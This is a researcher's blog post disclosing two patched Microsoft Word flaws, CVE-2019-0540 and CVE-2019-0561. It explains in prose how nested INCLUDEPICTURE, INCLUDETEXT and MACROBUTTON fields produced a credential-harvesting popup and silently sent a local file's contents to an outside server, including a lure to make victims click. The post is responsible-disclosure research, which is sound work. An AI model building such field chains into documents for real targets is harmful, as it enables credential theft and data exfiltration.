In January and February 2019 Microsoft provided patches for CVE-2019-0540 and CVE-2019-0561, which were reported by Stan and me. We disclosed the details in our Blackhat Asia talk “Office in Wonderland”. Both vulnerabilities abuse a feature in word called “fields”. In this blog post we will dive into this.
Fields are a powerful feature in Microsoft Word to handle all kinds of dynamic texts in a document (such as inserting a table of contents or the author’s name). This functionality stems from the early days of MS Word. In Word you can go to insert > quickparts > fields and you will be greeted with a large variety of fields and options.
One of the most commonly abused fields by attackers and red teamers is INCLUDEPICTURE. This field allows you to insert a picture into the document and mark it as dynamic (Data not stored with document). Once a victim opens a document outside protected mode, Word will retrieve the picture. This request can be used to track whether users open a specific malicious document.
Another common abuse of the INCLUDEPICTURE field is to have it load a picture from the intranet, which can be abused using relay attacks with tools such as Responder. More information about this technique can be found here.
Pro-tip: when working with Fields, use alt+F9 to switch between the ‘fieldcode’ and the regular display of the field.
CVE-2019-0540 – Word credential popup
Instead of using fields for tracking victims and relay attacks, we set out on a quest to create a credential popup in Word. This is a technique commonly applied by attackers for credential harvesting. For example, the cyber criminal group FIN4 was known to achieve this via VBA macros in order to steal credentials that would give access to insider trading information. We wanted to achieve the same thing (a credential harvesting document) without VBA and without triggering any security warnings.
Our first attempt was an INCLUDEPICTURE field that pointed to a webserver that always replied with a HTTP basic authentication request. It failed: Word did not show a credential popup after the document was saved and reopened.
We continued the research and took the approach to combine fields with various edge cases. We made the URL of the INCLUDEPICTURE dynamic by adding a USERNAME field within the URL, saved the field in the header of a Word template (dot) and suddenly we managed to get a working sample.
CVE-2019-0561 – Arbitrary file read
Another field of interest is INCLUDETEXT, this field will read a file and include its contents in the Word document. This is an ideal building block for arbitrary file read attacks.
An old vulnerability (CVE-2002-1143) showed that the combination of INCLUDETEXT and INCLUDEPICTURE fields could be abused back in the days to read an arbitrary file without displaying security warnings to the user. As far as we understood, Microsoft fixed this by no longer automatically updating the INCLUDETEXT fields on various events.
We wanted to see how robust the mitigation against file-reading attacks with INCLUDETEXT was, so we began combining fields in various ways. In that process we discovered that there was a MACROBUTTON field with the option ‘UpdateFields’. Once a user would double click this button a field would be updated. Note that the MACROBUTTON name can be a bit misleading: it is not VBA and does not trigger macro warnings.
We combined the INCLUDETEXT field with an INCLUDEPICTURE field to post the file contents away to a webserver. To lure a user into double-clicking the MACROBUTTON, we added a second INCLUDEPICTURE of a monkey and asked the user to ‘double click the monkey to see him dance’. Upon double clicking, the MACROBUTTON would kick off the chain of events and eventually the file contents of the file specified in INCLUDETEXT get pushed to our web server.
Microsoft’s mitigation was to include a new security warning in Word. This warning will likely alert on various similar field abuses as well.
Submitted to MSRC: September 2018
Patch release: January and February 2019
Public disclosure: March 2019